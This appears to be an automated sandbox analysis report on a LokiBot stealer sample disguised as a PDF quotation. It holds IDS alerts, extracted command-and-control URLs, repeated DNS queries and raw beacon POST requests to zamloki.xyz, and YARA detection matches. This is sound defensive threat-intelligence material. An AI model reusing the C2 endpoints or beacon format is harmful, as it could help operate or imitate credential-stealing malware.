              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 172.67.155.45:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractor, URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.top/alien/fre.php
              Performs DNS queries to domains with low reputation
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, DNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global traffic HTTP traffic detected: POST /des/co/tox.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: zamloki.xyz Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A3C8092 Content-Length: 190 Connection: close
              Source: global traffic HTTP traffic detected: POST /des/co/tox.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: zamloki.xyz Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A3C8092 Content-Length: 163 Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: 12_2_00404ED4 recv,12_2_00404ED4
              Source: unknown DNS traffic detected: queries for: zamloki.xyz
              Source: unknown
              HTTP traffic detected:
                POST /des/co/tox.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: zamloki.xyz
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A3C8092
                Content-Length: 190
                Connection: close
              Source: global traffic
              HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 21 Jul 2021 15:01:48 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Status: 404 Not Found
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCu%2BWGot2zpuW5laOc7rLI1l39a6SyWqikMVOpRxztbOUiIp6KZym9YNZO2pIMknfIVVsEI5nQEXhP26PTd67znu106LUnLvFFIGSw28Cq2kLuLTIuTufHdPgO%2FCsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 67254e7e3d562b65-FRA
                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.
              Source: Cotizaci#U00f3n.pdf.exe, Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ibsensoftware.com/
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.460794066.000000000049F000.00000040.00000001.sdmp String found in binary or memory: https://zamloki.xyz/des/co/tox.php

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              .NET source code contains very large strings
